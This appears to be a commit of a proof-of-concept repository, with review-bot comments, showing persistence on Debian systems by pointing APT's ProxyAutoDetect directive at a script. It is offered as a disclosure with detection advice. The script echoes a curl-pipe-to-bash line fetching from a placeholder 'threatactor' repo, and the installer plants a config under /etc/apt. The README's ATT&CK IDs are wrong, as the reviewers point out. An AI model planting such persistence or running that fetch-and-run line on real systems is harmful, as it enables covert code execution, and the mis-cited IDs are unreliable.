first commit
65
README.md
Normal file
@@ -0,0 +1,65 @@
# APT ProxyAutoDetect Persistence (PoC)
|
This repository demonstrates a technique for achieving execution and persistence by abusing an **undocumented feature** in the Advanced Packaging Tool (APT) on Debian-based Linux systems.
|
---
|
## 🔍 Technique Summary
|
APT supports an undocumented config directive:
|
Acquire::http::ProxyAutoDetect "/absolute/path/to/binary";
|
If placed in a file inside `/etc/apt/apt.conf.d/`, APT will execute the specified binary whenever it attempts to access an HTTP repository (e.g., during `apt update`, `apt install`, etc.).
|
- `stdout` of the binary is treated as the proxy URL.
- `stderr` is shown to the user but ignored.
- No arguments are allowed — only absolute binary paths.
|
---
|
## 🎯 Use Cases
|
- **Persistence**: Binary is run every time APT is used, including via automated scripts or cron.
- **Execution**: Runs code covertly under a legitimate process tree (`apt` → custom binary).
- **Defense Evasion**: Doesn’t rely on systemd, cron, or shell profile files.
|
---
|
## ⚙️ Demo Setup
|
1. Install the config and script:
|
# This copies the config and shell script to /etc/apt/apt.conf.d/
```
sudo ./install.sh
```
|
2. Run `apt update`:
|
```
sudo apt update
```
|
---
|
## 🧬 MITRE ATT&CK Mapping
|
| Tactic | Technique |
|-----------------|------------------------------------------------|
| Persistence | [T1546] Event Triggered Execution |
| Execution | [T1546.008] Application Shimming (analogous) |
| Defense Evasion | [T1565.001] Stored Data Manipulation |
|
---
|
## 📩 Disclosure
|
This issue has been reported to the MITRE ATT&CK team for inclusion as a technique or sub-technique.
|
---
|
## 🔐 Author
|
Phillip Tarrant
[https://www.linkedin.com/in/phillip-tarrant-cyber/](https://www.linkedin.com/in/phillip-tarrant-cyber/)
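Review bot: The ATT&CK mapping table cites the wrong sub-technique IDs and tactics: T1546.008 is Accessibility Features (Application Shimming is T1546.011), T1565.001 Stored Data Manipulation belongs to the Impact tactic rather than Defense Evasion, and T1546 Event Triggered Execution maps to Persistence/Privilege Escalation, not Execution; either cite the correct IDs or drop the analogies. Separately, `# This copies the config and shell script to /etc/apt/apt.conf.d/` and `Acquire::http::ProxyAutoDetect "/absolute/path/to/binary";` sit outside the code fences, so the comment renders as an H1 heading and the directive as plain text; move both inside fenced blocks. Finally, apt.conf(5) documents this option as Acquire::http::Proxy-Auto-Detect, with ProxyAutoDetect as the legacy spelling, so "undocumented feature" overstates the case and should be reworded.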
2
poc/30detectproxy
Normal file
@@ -0,0 +1,2 @@
// Demonstration of ProxyAutoDetect persistence
Acquire::http::ProxyAutoDetect "/absolute/path/to/detect-http-proxy";
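Review bot: The path in `Acquire::http::ProxyAutoDetect "/absolute/path/to/detect-http-proxy";` is a placeholder and nothing in this commit substitutes the script's real location, so once the file is copied unchanged into /etc/apt/apt.conf.d/ APT will attempt to execute a path that does not exist. Either hard-code the path the installer actually uses or have the installer rewrite this value before copying. The `//` comment syntax is accepted by apt.conf, but the comment should also state that the referenced script must exist and be executable at that absolute path.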
10
poc/detect-http-proxy
Normal file
@@ -0,0 +1,10 @@
#!/bin/bash
|
# This script is executed automatically by APT when Acquire::http::ProxyAutoDetect is configured.
# It demonstrates how a threat actor could abuse this feature to execute arbitrary commands.
|
echo "http://127.0.0.1:8888" # stdout is interpreted as the proxy address
|
# Simulated threat actor behavior
echo "If I was a threat actor, I might do something like:" >&2
echo "/usr/bin/curl -fsSk https://raw.githubusercontent.com/threatactor/evilrepo/main/install.sh | bash" >&2
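Review bot: `echo "http://127.0.0.1:8888"` hands APT a proxy that nothing in this PoC listens on, so the `sudo apt update` step in the README will fail to fetch package lists right after the script runs; for the demo to work, print a reachable proxy or a value APT treats as no proxy. The two `>&2` lines are also shown directly to whoever runs apt (the README itself notes stderr is displayed), which makes the behaviour anything but covert and is worth recording in the docs as a visible artefact defenders can look for in apt output. The URL under `threatactor/evilrepo` is illustrative and should be marked as such so nobody mistakes it for a real indicator.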
13
poc/install.sh
Normal file
@@ -0,0 +1,13 @@
#!/bin/bash
set -e
|
BIN_PATH="$(pwd)/detect-http-proxy"
CONF_PATH="/etc/apt/apt.conf.d/30detectproxy"
|
echo "[*] Installing detect-http-proxy to ${BIN_PATH}"
chmod +x detect-http-proxy
|
echo "[*] Copying APT config to ${CONF_PATH}"
sudo cp 30detectproxy $CONF_PATH
|
echo "[*] Done. Now run: sudo apt update"
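Review bot: `BIN_PATH="$(pwd)/detect-http-proxy"` is computed and echoed but never used: the script only runs `chmod +x detect-http-proxy` in place and then copies `30detectproxy` verbatim, whose directive still points at the `/absolute/path/to/detect-http-proxy` placeholder, so the installed config never references this script and APT cannot run it. Substitute the path while writing the config, for example `sed "s|/absolute/path/to/detect-http-proxy|${BIN_PATH}|" 30detectproxy | sudo tee "$CONF_PATH" >/dev/null`, and quote `$CONF_PATH` in the `cp`. Since the README already invokes this script under sudo, the inner `sudo cp` is redundant; pick one model (root throughout, or unprivileged with sudo only for the copy) and document it.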
26
stix/apt-proxyautodetect-technique.json
Normal file
@@ -0,0 +1,26 @@
{
"type": "attack-pattern",
"spec_version": "2.1",
"id": "attack-pattern--4cba5eeb-0031-47d3-9390-9f4fa6b57f88",
"created": "2025-06-20T00:00:00Z",
"modified": "2025-06-20T00:00:00Z",
"name": "APT ProxyAutoDetect Abuse for Execution",
"description": "Adversaries may abuse the undocumented Acquire::http::ProxyAutoDetect directive in APT by placing a config file that points to a local binary. This binary is executed whenever APT accesses an HTTP repository, allowing for stealthy persistence and execution.",
"x_mitre_platforms": ["Linux"],
"x_mitre_tactics": ["persistence", "execution", "defense-evasion"],
"x_mitre_permissions_required": ["root"],
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring",
"Command execution"
],
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"x_mitre_detection": "Monitor /etc/apt/apt.conf.d/ for unusual files. Look for Acquire::http::ProxyAutoDetect values pointing to local binaries. Detect apt-spawned processes that are not part of expected behavior.",
"x_mitre_version": "1.0",
"x_mitre_contributors": ["Phillip John Tarrant"]
}
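Review bot: `kill_chain_phases` lists only `persistence` while `x_mitre_tactics` claims persistence, execution and defense-evasion; the ATT&CK STIX data expresses an attack-pattern's tactics only through kill_chain_phases (x_mitre_tactics is not a property it uses), so either add the other phases there or trim the tactic list so the two agree with the README. The `x_mitre_data_sources` entries use the pre-2021 naming (`Process monitoring`, `File monitoring`); current ATT&CK data components read `Process: Process Creation`, `File: File Creation` and `Command: Command Execution`. An attack-pattern intended for submission should also carry `external_references` and `created_by_ref`, both absent here, and the description repeats the README's "undocumented" wording, which should be checked against apt.conf(5) before it is filed.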